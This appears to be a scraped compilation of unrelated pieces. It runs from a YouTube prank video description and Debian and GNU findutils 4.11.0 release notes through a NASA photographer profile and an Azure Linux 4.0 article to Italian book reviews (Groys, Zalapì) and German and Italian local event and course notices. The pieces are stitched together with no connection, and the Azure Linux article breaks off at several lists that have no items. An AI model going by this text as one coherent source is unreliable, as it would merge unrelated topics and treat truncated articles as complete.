SMELL YA LATER! Funny FART Prank in NYC!

NEW MERCH: https://crowdmade.com/collections/gilstrap
Instagram- GilstrapTV
Facebook - GilstrapTV
Twitter- GilstrapTV


bookworm). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.
trixie). This point release mainly adds corrections for security issues, along with a few adjustments for serious problems. Security advisories have already been published separately and are referenced where available.

This is to announce findutils-4.11.0, a stable release.
This release follows the recent POSIX (IEEE Std 1003.1-2024) changes,
especially to mention the new behavior of 'find -mount' vs. 'find -xdev',
as well as a lot of documentation improvements.
See the NEWS below for more details.
GNU findutils is a set of software tools for finding files that match
certain criteria and for performing various operations on them.
Findutils includes the programs "find", "xargs" and "locate".
More information about findutils is available at:
https://www.gnu.o ... ftware/findutils/
Please report bugs and problems with this release via the the
GNU Savannah bug tracker:
https://savannah. ... /?group=findutils
Please send general comments and feedback about the GNU findutils
package to the mailing list (<mailto:bug-findutils@gnu.org):
https://lists.gnu ... nfo/bug-findutils
There have been 186 commits by 10 people in the - sigh - 25 months since 4.10.0:
Bernhard Voelker (77) Bjarni Ingi Gislason (1)
Christoph Anton Mitterer (1) Collin Funk (5)
Dave (1) G. Branden Robinson (42)
James Youngman (55) Luk303241305241 Zaoral (1)
danny mcClanahan (1) raf (2)
This release was bootstrapped with the following tools:
Autoconf 2.72
Automake 1.17
M4 1.4.19
Gnulib v1.0-3131-ga575239e47
Please consider supporting the Free Software Foundation in its fund
raising appeal; see <https://www. ... .org/appeal/>.
Thanks to everyone who has contributed!
Have a nice day,
Bernhard Voelker & James Youngman [on behalf of the GNU findutils maintainers]
================================================================================
Here are the compressed sources:
https://ftp.gnu.o ... ils-4.11.0.tar.xz
Here are the GPG detached signatures[*]:
https://ftp.gnu.o ... 4.11.0.tar.xz.sig
Use a mirror for higher download bandwidth:
http://www.gnu. ... /order/ftp.html
Here is the SHA256 checksum:
bfd19cb06cc71f3352d567e90284d8cdac02ac89774bbeadf0b533b0c11432fd findutils-4.11.0.tar.xz
[*] Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:
gpg --verify findutils-4.11.0.tar.xz.sig
If that command fails because you don't have the required public key,
then run this command to import it:
gpg --keyserver keys.gnupg.net --recv-keys 0CF4E8D871593224842832B888DD9E08C5DDACB9
and rerun the 'gpg --verify' command.
================================================================================
NEWS
** Bug Fixes
find no longer crashes when diagnosing a directory cycle (without a symlink
being involved pointing to a parent directory).
[Bug present since the FTS implementation.]
'find -used' now behaves correctly on OpenBSD 7.8 with difftime(3) underflow
bug in the C library (already fixed there) when the access time of a file is
identical to its change time. [#68264]
'find -ignore_readdir_race' now better handles races between FTS reading a
directory and visiting its entries when the file or directory was meanwhile
removed. [#45930]
To fix a POSIX compatibility bug, -exec foo Z{} + is no longer a
complete predicate, because '+' is only a terminator when it follows
an argument which is exactly '{}'. The findutils documentation
already states this, and now find's behaviour matches the
documentation. [#66365]
'updatedb.sh' now properly handles the variables for the 'find' and 'frcode'
utilities, and hence avoids command injection.
** Changes in find
As announced since the release of 4.7.0 (2019) and mandated by POSIX 2024,
the behaviour of the -mount option changed: while it was a mere alias for
the -xdev option to prevent descending into directories of another device,
the -mount option now makes find(1) ignore files on another device, i.e.,
'find -mount' will skip the entry of active mount points already.
Example, assuming the PROC filesystem is mounted on '/proc':
$ find / -mount -path /proc -print
$ find / -xdev -path /proc -print
/proc
[#54745]
The actions -execdir and -okdir now refuse the '{}' replacement in the zeroth
argument of the command to be run. While POSIX allows this for -exec, this is
deemed insecure as an attacker could influence which files could be found.
'find -regex' with the default or the 'emacs' regextype now aligns better with
Emacs behaviour, and therefore e.g. supports character classes:
$ touch 123 && find -regex './12[[:digit:]]'
./123
find now issues a warning when the punctuation operators '(', ')', '!' and ','
are passed with a leading dash, e.g. '-!'. Future releases will not accept
that any more. Accepting that was rather a bug "since the beginning".
** Improvements
xargs now gives a better error diagnostic when executing the given command
failed.
** Documentation Changes
The most recent version of the POSIX standard (IEEE Std 1003.1-2024,
also known as The Open Group Base Specifications, Issue 8) has
standardised "find -print0" and "xargs -0". Our documentation now
points this out. Similarly for 'find -iname'.
The code example for "Finding the Shallowest Instance" in the Texinfo manual
and the corresponding one in the EXAMPLES section in the find.1 man page have
been fixed. [#62259]
Translators contributed numerous fixes for issues in the find.1 man page.
The list of actions that suppress the default -print action has been
supplemented with the missing '-print0' and '-fprint0' actions.
The manual pages have been updated to give better and/or more
consistent output with manpage formatters other than GNU roff.
** Translations
Updated the following translations:
Arabic, Brazilian Portuguese, Bulgarian, Chinese (simplified), Croatian,
Czech, Dutch, Estonian, French, German, Indonesian, Korean, Polish,
Portuguese, Romanian, Spanish, Swedish, Ukrainian.
** Future Changes
A future release will remove the warning message find prints about
the 2007 change in the meaning of "-perm /000". Everybody who is
likely to care probably knows about this change by now.
-eof-
2 min read

NASA flight photographers capture history from a perspective few ever experience, getting a rare bird’s-eye view of the agency’s missions in action. Their photos document key NASA research and give the public a front-row seat to the work happening behind the scenes.
Jim Ross, a photographer at NASA’s Armstrong Flight Research Center in Edwards, California, flew over Washington during the Fourth of July celebration to document a NASA flyover commemorating America’s 250th birthday. He’s captured some of the agency’s most exhilarating milestones, like early SR-71 flights, the delivery flight of Space Shuttle Endeavour to Los Angeles, and first flights of NASA’s X-59 quiet supersonic research aircraft.
“I grew up in Bozeman, Montana, when it was still considered a small town, so if someone told that little kid that he would be flying in a F-18 over the National Mall, he would have never believed it,” Ross said. “I love documenting history, and having the opportunity to capture flights and launches has kept me doing it for almost 37 years.”
Ross began his aviation photography career in 1989 when he joined the staff at NASA Armstrong (then Dryden). He became the photo lead in 1997, a title he retains.
Check out his images from the flyover here: https://www.nasa.gov/gallery/freedom-250/




Microsoft has officially unveiled Azure Linux 4.0, the latest version of its open-source Linux distribution designed for cloud infrastructure, enterprise workloads, and modern data centers. Formerly known as CBL-Mariner, Azure Linux has powered Microsoft's internal cloud services for years, but version 4.0 marks its biggest evolution yet by becoming a general-purpose server operating system that organizations can deploy both inside and outside Azure.
The release introduces updated core components, expanded hardware support, a predictable long-term lifecycle, and improved compatibility for enterprise environments, reinforcing Microsoft's growing investment in the Linux ecosystem.
Azure Linux began as Microsoft's internal operating system for Azure services, containers, and cloud infrastructure. Over time, it evolved into the foundation for many Azure-hosted workloads.
With Azure Linux 4.0, Microsoft is positioning the distribution as a broader enterprise Linux platform rather than one limited to Azure infrastructure. The operating system is now available through Azure virtual machine images, container images, and downloadable ISO files for testing and deployment in a wider range of environments.
Unlike desktop-focused Linux distributions, Azure Linux is optimized for infrastructure, virtualization, containers, and cloud-native applications.
Typical deployment scenarios include:
Microsoft has designed the distribution to provide a consistent operating system foundation across Azure services while remaining suitable for on-premises deployments.
Azure Linux 4.0 modernizes much of the operating system's software stack.
Highlights include:
These updates improve hardware compatibility, application support, security, and overall system performance while providing developers with a more current software platform.
Security continues to be one of Azure Linux's defining characteristics.
Version 4.0 includes:
La guerra in Ucraina non si combatte solo sul terreno, nel mare o nello spazio aereo. Il cyberspazio è uno degli scenari più attivi, dove vengono perpetrati quotidianamente decine di attacchi mirati alle infrastrutture civili e militari. Il continuo bersagliamento di infrastrutture energetiche, reti di comunicazione e servizi pubblici ha praticamente trasformato l’intero Paese in […]
L'articolo La guerra ucraina cambia la sicurezza delle infrastrutture critiche proviene da Securityinfo.it.

La contemplazione di sé è per l’essere umano non tanto un bisogno naturale quanto un desiderio, come dimostra la nostra fisiologia, che ha collocato gli occhi nella zona anteriore della testa, da dove è impossibile guardare se stessi integralmente. In Diventare un’opera d’arte (Timeo, 2026) il filosofo tedesco Boris Groys muove dalla considerazione che questo desiderio è narcisistico nel senso letterale del termine, in quanto presuppone che chi lo serba si trasformi in un’immagine oggettiva e accessibile a chiunque, in primo luogo a sé stesso, proprio come Narciso che si specchiava nelle acque del lago.

Nel suo agile saggio Groys mostra come questo desiderio sia divenuto universale nella nostra società e connesso a quello di una qualche forma di vita dopo la morte, garantita proprio dall’immagine, indipendente dal corpo del defunto. Le considerazioni di Groys si allargano poi alle opere d’arte e alle installazioni che sopravvivono al defunto e sono a lui dedicate, come mausolei o monumenti. Tutte queste cose assolvono la funzione di rendere visibile la persona cui si riferiscono – a prescindere che si tratti di una celebrità, di un artista o di un personaggio illustre –, dando così rispondenza a un desiderio narcisistico, ma non solo: esercitano anche un influsso sul nostro immaginario collettivo e dunque, almeno indirettamente, sulle decisioni collettive attraverso le quali si dipana la vita in società.
Secondo il filosofo tedesco, il narcisista aspira ad appropriarsi della prospettiva di cui gli altri godono sul proprio corpo, in altre parole vuole “guardarsi attraverso gli occhi degli altri” (p. 8); si pone così in una posizione eccentrica rispetto a sé stesso, per ammirarsi come dovrebbero ammirarlo gli altri: a distanza, come un oggetto gradevole che si dà nello spazio. Nella misura in cui rappresenta visivamente e ostenta le proprie sembianze, il narcisista crea “uno spazio di mediazione tra il [suo] sguardo e quello degli altri” (p. 19): è su questo terreno che – soprattutto quando la sua immagine contrasta con le convenzioni dominanti – lotta per affermare e prendere il controllo della propria immagine esteriore, sociale.
Sebbene l’ambizione del narcisista sembri chiamare in causa una smodata considerazione del suo ego, il suo modus operandi contraddice le basilari esigenze di autoconservazione e cura di sé: infatti, per offrirsi allo sguardo al contempo proprio e degli altri, il narcisista deve diventare quel che Groys chiama “forma pura, vuota”, cioè spogliarsi dell’“oscuro spazio di interessi privati, bisogni e desideri al di sotto della sua superficie” (p. 17), rinunciare alla propria soggettività, sacrificare il proprio mondo interiore in nome della propria immagine esteriore. Così il filosofo tedesco accomuna Narciso, talmente immerso nella contemplazione di sé da morire di inedia, e Cristo, che tramite la crocifissione assurge a icona sacra per tutti i fedeli. Il processo di spoliazione interiore del sé intrapreso dal narcisista viene infatti accostato da Groys alla “kenosi”, termine che nella teologia cristiana indica lo svuotamento di sé praticato da Cristo, che si estrania dalla propria natura divina per assumere la condizione umana e farsi servo obbediente di Dio fino proprio alla morte in croce.
Però, mentre il sacrificio di Cristo si compie in nome del disegno divino, quello di Narciso si consuma nel segno della completa socializzazione di sé; per socializzazione di sé Groys intende l’ingresso e l’affermazione della propria immagine nell’immaginario collettivo, il suo riconoscimento presso il pubblico. La nostra società secolarizzata ha abbandonato il disegno divino e inaugurato “un mondo di design totale” (p. 35), dove è lo sguardo divino è stato sostituito da quello degli altri; quest’ultimo è esclusivamente esteriore:
la società vede solo il nostro corpo e non la nostra anima. L’atteggiamento etico viene sostituito da quello estetico ed erotico. Alla società non interessa la nostra anima, ma la nostra immagine pubblica. (p. 12)
Il desiderio di essere accettati da Dio, che implica di occuparsi della propria anima, viene rimpiazzato da quello di essere ammirato dagli altri, che esige di conformare la propria immagine.
Ciò non significa che la società del design totale sia completamente dimentica dell’anima; anzi, sotto il suo influsso l’anima si materializza: essa infatti si estetizza e si manifesta attraverso l’immagine di sé che ciascuno riesce a costruire. Ecco: l’essere umano designer di sé stesso.
Secondo Groys, il design di sé diviene il medium per la costruzione e lo svelamento dell’anima, che, in questa prospettiva e nei limiti della nostra biologia, si identifica così con l’aura data dall’aspetto che scegliamo per il nostro corpo, dai vestiti che indossiamo, agli oggetti di cui ci circondiamo, dagli spazi che abitiamo, fino ai contesti culturali a cui apparteniamo. Adulterando un popolare proverbio, potremmo dire che “l’abito fa l’anima”.
Ciò che conta al fine di determinare la propria immagine è non soltanto il corpo, ma tutto quanto lo circonda: Groys parla di cornice per indicare l’ambiente in cui ci localizziamo e che, con noi ben posizionati al suo interno, ritagliamo per offrirci allo sguardo degli altri, proprio come Narciso, che incornicia il riflesso del suo corpo nel lago. Ritrarsi con un selfie mentre si è in un viaggio di volontariato oppure in visita presso la sede di un’istituzione politica sovranazionale o presso l’Expo non è un fatto neutrale: in ciascun caso si dichiarerà la propria adesione a un certo immaginario, se non a precisi valori, mentalità, programmi e ideologie.
Secondo il filosofo tedesco la politica non è immune da questo processo di estetizzazione dell’anima, di presentazione della propria etica allo sguardo degli altri:nella misura in cui sono estetizzati dai media, i corpi dei politici si fanno veicolo di dichiarazioni più precise e credibili di piani e programmi, spesso soggetti a cambiamenti arbitrari e comunque esposti a una proliferazione che sovrasta il tempo di attenzione del pubblico. Così, la presenza di un politico in un centro di accoglienza e la sua prossimità fisica ai migranti e agli operatori del centro oppure alle locali forze dell’ordine è percepita dal pubblico come ben più impressionante, e dunque convincente, dei punti dedicati al tema migratorio dal programma elettorale del suo partito di appartenenza.
All’estetizzazione della politica fa da contrappunto “la politicizzazione dell’arte” (p. 47): secondo Groys, quando si guarda un’opera d’arte non si può fare a meno di guardare il suo contesto, cioè la cornice nella quale viene presentata, come se opera e cornice costituissero un corpo unitario. L’artista può servirsi così di qualsiasi contesto geografico (urbano, rurale, industriale, bellico o naturale) come cornice per politicizzare la sua opera, per conferirle un’aura che palesi la propria etica. Così, i murales realizzati da Bansky a Gaza e in Cisgiordania, come quelli che ritraggono un soldato israeliano che controlla i documenti di un asino o una ragazzina palestinese che perquisisce un soldato, manifestano la personale visione politica dello street artist anche per il fatto di essere localizzati negli spazi dell’occupazione militare, talvolta persino sui resti di edifici distrutti dai militari israeliani.
Insomma, che si prendano in considerazione le persone comuni o i politici o gli artisti e le loro opere, l’estetizzazione è trasversale e si compie attraverso il design di sé e dunque costruendo una cornice nella quale collocare la propria immagine (o, nel caso degli artisti, le proprie opere).
Groys scrive che viviamo circondati dagli altri e dal loro sguardo: se ne può dedurre che il posizionamento in una cornice – presentarsi, per esempio, come membro del nucleo artistico del quartiere o affiliato a un network di scrittori della controcultura di una città – dipende dalla capacità di farsi spazio tra gli altri ed esporsi senza timore al loro giudizio; e questa capacità è strettamente legata alla posizione di classe e al capitale culturale, cioè al sapere che abbiamo maturato pagando rette universitarie e post-universitarie e di cui ci avvaliamo per farci strada nel caotico mondo del design di sé.
Secondo Groys, manifestarsi sotto forma d’immagine localizzata in una cornice “vuol dire prodursi sotto forma di opera d’arte” (p. 25) e dunque nella parvenza di cosa meritevole di tutela e cura:
Per un essere umano, diventare un’opera d’arte significa liberarsi dalla schiavitù, rendersi immune alla violenza, evitare di essere utilizzato come mezzo per il bene sociale, diventare oggetto di protezione. (p. 75)
La protezione assicura all’immagine la durevolezza nel tempo: l’aspirazione del narcisista è infatti di riscuotere l’ammirazione non solo dei suoi contemporanei, ma anche delle generazioni future. Così, la produzione dell’immagine di sé coincide con la produzione di vita ultraterrena: le immagini sono indipendenti dalla nostra presenza e capaci di manifestarsi oltre la durata della nostra vita. L’accesso alla vita ultraterrena è garantito al narcisista da quel che Groys identifica come “cadavere pubblico”. Questa espressione ricomprende non solo le immagini, ma anche manufatti artistici e prodotti culturali, nonché cose materiali e immateriali (come i profili social), che si riferiscono al defunto.
Nel suo precedente saggio Filosofia della cura (Timeo, 2023) Groys parla di corpi simbolici, un’espressione maggiormente ampia che indica tanto i documenti che ineriscono alla nostra persona e ci consentono di avere accesso al sistema di cura quanto i prodotti dell’ingegno e dello spirito di una persona. Per sistema di cura Groys intende quel complesso di istituzioni, sorte in concomitanza con l’affermarsi degli Stati-nazione, che tutelano e preservano la salute delle persone in un’ottica biopolitica: è l’endiadi di Stato-nazione e capitale a volerci occupabili e produttivi, nonché buoni e affidabili cittadini.
Il sistema di cura – spiega però Groys in Diventare un’opera d’arte – non si occupa esclusivamente dei nostri corpi fisici ma anche dei corpi simbolici, onde preservarli dall’azione del tempo; precisamente, si fa carico di quei corpi simbolici che rappresentano al contempo cadaveri pubblici.
Così, la mediazione del sistema di cura è necessaria per la sopravvivenza dei cadaveri pubblici. Groys nota come l’impegno profuso dal sistema di cura vari nel corso della storia, in dipendenza sia del tipo di cadavere pubblico che della tecnologia a disposizione della civiltà.Le piramidi egizie, che svettano nel deserto come montagne, come enti della natura, abbisognano di una manutenzione praticamente nulla.
Le civiltà successive, come la greca e la romana, hanno assicurato la vita ultraterrena delle persone più illustri tramite statue e monumenti, cadaveri pubblici meno resistenti alla prova del tempo. Per questo i monumenti sono periodicamente sottoposti a restauri e le statue vengono sorvegliate e custodite in musei o siti culturali, cioè in spazi dedicati, che – basandoci sul lessico di Groys – potremmo definire come cimiteri di cadaveri pubblici.
I manoscritti prodotti dagli amanuensi nel medioevo e i quadri di quell’epoca, del Rinascimento e delle successive fasi artistiche si dimostrano ancora più fragili: si trovano non solo in dei musei, ma anche dentro teche di vetro che li proteggono dall’azione corrosiva dell’atmosfera.
Il corpo di Lenin conservato nel mausoleo per lui appositamente costruito a ridosso delle mura del Cremlino sulla piazza Rossa di Mosca è un esempio di come la sorte dei cadaveri pubblici dell’età moderna sia legata a doppio filo alla tecnologia: un gruppo di lavoro dell’Istituto di ricerca per le strutture biologiche di Mosca lo monitora costantemente per mantenerlo in condizioni adatte all’esposizione.
Nell’epoca contemporanea, in cui la digitalizzazione invade sempre più momenti e attività della nostra vita, smaterializzandoli, i cadaveri pubblici “sono frammentati e sparpagliati” (p. 96) nello spazio digitale: la loro esistenza dipende dalla fornitura di energia elettrica, che a sua volta dipende dallo sfruttamento delle risorse naturali da parte dell’essere umano e dunque dalla salute di quel che Marx chiamava ricambio organico tra uomo e natura. La democratizzazione dell’accesso alla vita ultraterrena, la garanzia offerta da internet di un cadavere pubblico per ciascuno, è direttamente proporzionale alla fragilità dello stesso cadavere pubblico.
Così, gli scritti di un autore, come pure i primi piani di una celebrità televisiva, sono disseminati tra le pagine web, e all’utente dello spazio digitale non resta altro da fare che agire come Iside, la quale recuperò per tutto l’Egitto i brani del corpo del marito per ricomporlo. Riunire invece i cadaveri pubblici in cimiteri dedicati – come biblioteche, pinacoteche e musei – significa salvarli da quel decentramento estremo prodotto da internet. Inoltre, l’articolazione del sistema culturale in archivi e depositi accessibili, in pratica in siti museali, ci permette di comunicare con autori e artisti defunti e di apprendere le forme pure e vuote che essi hanno prodotto tramite quello svuotamento di sé che è il presupposto del desiderio narcisistico: in tal modo forme risalenti a epoche passate possono essere utilizzate “come maschere e costumi per i corpi viventi contemporanei”, dando luogo a una sorta di revival culturale che promette “un nuovo inizio che cambierebbe il corso della storia” (p. 79). Groys ritiene che, per cambiare la società, sia necessario un revival delle vecchie forme anziché un’invenzione di nuove forme:
per cambiare noi stessi o la società dobbiamo uscire da questa società, trovare una metaposizione in rapporto a essa dalla quale il cambiamento diventi possibile. Qualsiasi forma che venga inventata qui e ora appartiene alla contemporaneità, anche se è proiettata nel futuro. Questo significa che solo il passato può offrire una raccolta delle metaforme vuote che possono essere riempite dal nuovo contenuto. (p. 91)
Le forme pure del passato capaci di orientarci nella direzione da imprimere al nostro vivere comune vengono selezionate tramite l’evoluzione culturale: sono lo stato di salute dell’immaginario collettivo e le convenzioni maggioritarie nell’opinione pubblica a gettare nell’oblio o chiamare alla resurrezione i cadaveri pubblici.
Il saggio di Groys lascia spazio ad alcune considerazioni sui cadaveri pubblici e sul loro ruolo nella nostra contemporaneità. La loro solidità dipende senz’altro dalla posizione di classe, dal genere e dall’etnia del defunto cui si riferiscono, ma anche dal suo capitale simbolico – cioè dalla capacità di attrarre l’attenzione. Questa capacità si traduce nell’influenza che i cadaveri pubblici possono esercitare sul nostro immaginario collettivo e sulle nostre credenze e opinioni. Che influsso possano avere sul presente i cadaveri pubblici di cui è disseminata l’infosfera, troppo numerosi per godere tutti quanti di una considerazione tale da elevarli a modelli e comunque smembrati in brani che segmentano l’attenzione dei nostri contemporanei? Nell’attuale epoca del semiocapitale, in cui l’attenzione delle persone, scarsa e deperibile, viene catturata al fine di estrarre dati da vendere, l’attenzione da dedicare a questo o a quell’altro defunto è determinata dalle prospettive di sfruttamento economico del suo cadavere pubblico, rese fattibili dall’accesso a pagamento ai siti museali e dai diritti d’autore sulle opere artistiche e letterarie. Se, per esempio, il cadavere pubblico di Che Guevara può esercitare un qualche influsso sulla nostra vita associata, assurgendo a forma pura da assumere per cambiare il presente, ciò dipende dalla vendibilità dei libri su di lui e dalle potenzialità turistiche dei siti a lui dedicati, in ultima istanza dalla commerciabilità della sua immagine e della relativa cornice. Così, l’economia cannibalizza la politica.
The post Tra Cristo e Narciso – Su Diventare un’opera d’arte (Timeo, 2026) di Boris Groys first appeared on Stanca.
Grande riconoscimento per Giusi Napoli, dottoressa in Design Tessile e Moda, selezionata dalla Fondazione Italia-USA per il prestigioso premio dedicato alle eccellenze universitarie.
Grande riconoscimento per Giusi Napoli, dottoressa in Design Tessile e Moda, selezionata dalla Fondazione Italia-USA per il prestigioso premio dedicato alle eccellenze universitarie.

Der Funkamateur-Club Basel (FACB) verwandelt die SSA Sichern in ein Zentrum für Funkbegeisterte und Neugierige.
Wer glaubt, Funktechnik sei ein verstaubtes Relikt aus dem letzten Jahrhundert, täuscht sich gewaltig. Die Faszination der drahtlosen Kommunikation zieht nach wie vor Menschen jeden Alters in ihren Bann. Ein perfektes Beispiel liefert der Funkamateur-Club Basel (FACB) am Sonntag, 30. August 2026. Von 10 bis 16 Uhr öffnen die Clubmitglieder die Türen der SSA Sichern in Liestal für einen Erlebnistagmit vollem Programm.
Live-Betrieb
Die Veranstalter setzen voll auf die Praxis. Funkamateurinnen und Funkamateure sowie technikbegeisterte Gäste können den Live-Funkbetrieb aus nächster Nähe mitverfolgen, Mikrofone in die Hand nehmen und die Atmosphäre spüren. Die Swiss CB Organisation (SCBO) ist ebenfalls präsent, und der Stand von Lutz-Electronics dürfte die Herzen von Technikfans höher schlagen lassen.
Happy Radio Basel vor Ort
Ein weiterer Publikumsmagnet wird das mobile Studio von Happy Radio Basel. Die Radiomacher des DAB+-Senders senden live vom Festgelände via Link über den Sender Chrischona und erfüllen die Musikwünsche der Besucher/-innen direkt vor Ort.
Fuchsjagd und Löten
«Wir wollen den Funk greifbar machen», sagt ein Mitglied des Organisationskomitees. Das gilt ganz besonders für den Nachwuchs. Die Funker/-innen von morgen jagen bei einer Schnitzeljagd mit Empfängern versteckten Peilsendern hinterher oder bauen an der Lötstation ihr erstes eigenes Souvenir zusammen. Wer lieber nach Schätzen aus der Fundgrube oder Ersatzteilen sucht, wird auf dem Flohmarkt fündig.
Kulinarische reiches Angebot
Ganz wichtig: Niemand muss den Tag mit leerem Magen verbringen. Die Küche fährt mit Risotto, Pommes und Grilladen gross auf, flankiert von kühlen Getränken und einem reichhaltigen Kuchenbuffet.
Die Logistik steht. Autofahrer/-innen nutzen die gratis Parkplätze direkt vor Ort. Wer mit der Bahn anreist, steigt am Bahnhof Liestal bequem in den kostenlosen Shuttlebus um, der die Festgemeinde direkt zum Areal bringt.
Published: HB9HGH 2026-07-09 19:21:26
Sono ufficialmente aperti i bandi di selezione ESTAR per i nuovi corsi OSS, anno formativo 2026-2027. I posti totali disponibili sono 476, suddivisi tra le sedi di Empoli, Firenze, Pistoia, Prato e Borgo San Lorenzo. C’è tempo fino al 14 settembre 2026 alle ore 12:00 per presentare la domanda e accedere alla prova scritta.
Sono ufficialmente aperti i bandi di selezione ESTAR per i nuovi corsi OSS, anno formativo 2026-2027. I posti totali disponibili sono 476, suddivisi tra le sedi di Empoli, Firenze, Pistoia, Prato e Borgo San Lorenzo. C’è tempo fino al 14 settembre 2026 alle ore 12:00 per presentare la domanda e accedere alla prova scritta.

“Papà dice che”, “papà mente”, “papà prende una pesca”, “papà non sarà contento”, “papà non è qui”, “papà mi accarezza”, “papà ride”, “papà ha chiamato”… Sono solo alcune delle frasi che concludono i capitoli di Ilaria o la conquista della disobbedienza, romanzo di Gabriella Zalapì pubblicato da Gramma a giugno di quest’anno. Le formule finali dei capitoli sono la chiave di accesso fondamentale per entrare nel libro e coglierne il funzionamento: il papà di Ilaria, la protagonista, è l’asse attorno cui ruotano le sue vicende, come il polo di una calamita che riporta a sé tutto ciò che accade nelle pagine precedenti. Per poter iniziare un capitolo nuovo la protagonista, che scrive una sorta di diario di viaggio sotto forma di romanzo, deve tornare a suo padre, riportare su di lui la macchina da presa e solo allora poter cambiare inquadratura.
Siamo negli anni Ottanta, e quasi tutto il libro è una road story all’interno di una BMW blu scuro. È la macchina del padre di Ilaria che, non accettando la separazione dalla moglie, prende la loro figlia e la costringe a una fuga rocambolesca in giro per l’Italia. Il più possibile nascosti, e con l’intento di ricattare l’ex moglie che Ilaria non può più vedere.
L’aspetto che rende più interessante il libro di Zalapì è la sensazione di un’infanzia strozzata che pervade tutto il racconto. La leggerezza di Ilaria e la spensieratezza con cui, soprattutto all’inizio, minimizza la fuga di e con suo padre – trovandoci quasi un che di fantastico – si fermano come un singhiozzo a metà della gola e restano lì, senza poter né uscire né scomparire del tutto. La forza della scrittura dell’autrice sta proprio nella capacità di far sentire in modo limpido che quel singhiozzo è strozzato, nel saper immortalare l’infanzia in una fase intermedia tra l’espressione e il soffocamento. Non è una bambina Ilaria, perché viene costretta a fare i conti con le follie degli adulti; ma neanche un’adulta, perché in cuor suo guarda il padre con gli occhi di una bambina innamorata. E il ritratto che ne esce è proprio quello di una figura multiforme: la storia e soprattutto la narrazione riescono a restituire la natura ibrida, incompleta e da entrambi i lati abbozzata di Ilaria – che trova la sua compiutezza solo nella disobbedienza del titolo. Ad esempio, mentre il padre la rende felice con Birillo, un orsacchiotto di peluche di cui si innamora dalla vetrina, Ilaria pensa “Papà mi strizza la guancia tra l’indice e il medio con sguardo dolcissimo. Quel gesto è come la sua firma sulla mia guancia. Lo ripeterà per due anni e finirò per odiarlo”. E il testo oscilla tra un quadretto d’infanzia e un ricatto inquietante, da una riga all’altra scena dopo scena; tra un dolce viaggio on the road padre-figlia e una minacciosa violenza imposta e stridente.
“Al volante, ascolta con attenzione il cantautore, le note del piano, i violini. E torno ogni sera dove tu stringevi la mia mano. Ed il tuo viso è una sera piena di ombre.
Papà non dice più niente. Quando mi volto, vedo che ha le guance lucide, sono piene di lacrime. Vorrei consolarlo ma non so come. Allora gli metto una mano sul braccio. Mi sorride. La mia Principessa… tu sì che mi capisci.
È la prima volta che mi chiama “Principessa”.
Accendimi una sigaretta. Mi tremano troppo le mani.
Protesto.
Su, non fare tante storie! Prendi una sigaretta e quando avvicini la fiamma dell’accendino, aspira. È facile, prova.
Obbedisco controvoglia. Sorpresa dal fumo acre in gola, tossisco.
Sei tutta rossa! Papà ride”
Lo stesso senso di infanzia che resiste nei modi, nei sogni e negli occhi del protagonista ma che al contempo viene interrotto e bloccato dalla violenza di un adulto – un padre, anche in questo caso – lo ritrovo in un libro Sorj Chalandon che in Italia ha tradotto Guanda. Si intitola La professione del padre e, con ancora più brutalità di quella che ho trovato in Ilaria o la conquista della disobbedienza, racconta la storia di un padre che costringe il figlio dodicenne, Èmile, a entrare nella sua organizzazione segreta e combattere perché l’Algeria resti francese nella Francia di de Gaulle. Il fatto che l’uomo possa essere una spia è, probabilmente, frutto di una falsificazione e rielaborazione credulona agli occhi del figlio che confonde continuamente verità e menzogna.
La vita di Èmile, infatti, è un continuo addestramento in nome di un’ideale che, dodicenne, neanche riesce a comprendere, messa in atto per ricevere l’approvazione di un padre che, in quanto figlio, non riesce a mettere in discussione. Nel libro, però, la violenza subita – come quella di Ilaria che viene letteralmente rapita – si mescola alla percezione ingenua del padre come fonte indiscutibile di affetto. In entrambi i casi il risultato sono storie dal sapore dolceamaro, che non accusano in modo perentorio e netto i padri, ma riescono a rielaborare con occhio adulto e a volergli bene nella loro imperfetta – e umana – tendenza a sbagliare. Se Ilaria ed Èmile sono esseri bifronti metà bambini e metà adulti, i due padri risultano a loro volta come figure ibride: sono il papà ma anche l’uomo. E in questa ambivalenza del papà-uomo sta lo spazio per costruire, con la prosa lirica di entrambi i libri, una storia allo stesso tempo di affetto e di denuncia.
Questa fisicità mostruosa dei padri e dei figli mi fa pensare a Eric, una serie tv di qualche anno fa in cui Benedict Cumberbatch interpreta un padre instabile, Vincent Anderson, che, disperato per la sparizione del figlio Edgar di nove anni, lo cerca in tutta New York – soprattutto la parte di città invisibile, povera e malconcia. A partire dalla sua professione di burattinaio, Vincent va alla ricerca di suo figlio insieme a un gigantesco mostro blu. Accanto a Cumberbatch appare una figura animata che rappresenta un disegno di Edgar. Sappiamo che l’infanzia è l’epoca dei mostri, e in qualche modo il mestiere di Vincent lo mantiene in un’area molto vicina a quelle creature che popolano il nostro immaginario quando si è bambini; Eric però – così si chiama il pupazzo peloso – mi sembra anche il simbolo delle dinamiche mutaformi che intercorrono tra padri e figli. È la forma che si può dare a quella cosa indefinita che si chiama relazione. Se Ilaria, Èmile e Vincent dovessero immaginare e disegnare il rapporto con i loro padri, la somma di sé e di quei papà, probabilmente disegnerebbero Eric: un mostro.
“È nervoso.
È arrabbiato.
Diventerà cattivo.
Da qualche settimana, Papà si scalda per niente. Dice che non sopporta l’inverno, che non sopporta la mancanza di luce. A volte, si arrabbia così tanto che vedo volare delle bocce d’acciaio sopra la mia testa. Rabbrividisco e mi tappo le orecchie.
L’altro giorno, mi ha chiamato Antonia, come la Mamma.
Ormai, prima di aprire bocca, ci penso due volte. Comincio la frase, lo guardo e se vedo il minimo segno d’irritazione, taccio.
Rispondi quando ti parlo.
Esito”.
